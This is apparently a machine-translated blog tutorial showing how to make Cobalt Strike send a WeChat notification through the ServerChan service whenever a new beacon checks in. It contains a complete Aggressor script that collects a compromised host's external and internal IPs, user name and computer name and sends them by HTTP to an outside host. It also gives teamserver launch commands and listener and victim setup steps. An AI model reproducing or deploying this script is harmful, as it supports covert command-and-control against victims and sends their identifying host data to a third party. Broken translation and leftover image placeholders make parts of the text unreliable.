CobaltStrike, you have a host online

Reference list:
Use Server sauce to realize Cobalt Strike host launch WeChat reminder Use ServerChan to realize Cobalt Strike
launch WeChat reminder

Server sauce

Website address: http://sc.ftqq.com/3.version
Insert picture description here

log in

You need to log in to this website, or you can log in with your GitHub account with one click, then bind to "WeChat Push"
Insert picture description here
and then click "Send Message" to do a test to confirm that the message is received normally, and the "call code" next to it will be used for a while When it arrives, copy it, and then you can leave the page.
Insert picture description here

Prepare the script

Prepare a http_ftqq.cnascript called , if you want to ask why, just ask Server sauce.
Fill in the SCKEY code on line 25, which is the "call code" you just copied

# 循环获取所有beacon
on beacon_initial {
    
    

    sub http_get {
    
    
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];

        @content = readAll($handle);

        foreach $line (@content) {
    
    
            $output .= $line . "\r\n";
        }

        println($output);
    }
    #获取ip、计算机名、登录账号
    $externalIP = replace(beacon_info($1, "external"), " ", "_");
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");

    #get一下Server酱的链接
    $url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;

    http_get($url);

}

Cobalt Strike preparation

The next step is to launch a host, you can play whatever you want

The cs server is started on kali

sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456

cs client starts on kali

sudo chmod +x start.sh
./start.sh

Load script

Insert picture description here
Insert picture description here

New monitor

Insert picture description here
Insert picture description here
Insert picture description here
Insert picture description here

Victim preparation

Insert picture description here

online

Insert picture description here
Insert picture description here

Guess you like

Origin blog.csdn.net/weixin_44288604/article/details/110733870